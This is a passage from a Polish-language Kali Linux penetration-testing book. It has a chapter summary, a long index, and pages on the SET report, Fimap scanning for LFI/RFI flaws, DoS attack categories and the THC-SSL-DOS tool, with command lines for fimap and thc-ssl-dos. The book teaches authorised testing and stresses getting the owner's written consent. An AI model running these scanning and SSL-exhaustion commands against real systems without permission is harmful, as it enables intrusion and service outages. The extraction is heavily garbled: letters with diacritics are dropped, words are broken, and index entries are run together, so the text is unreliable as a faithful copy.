W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
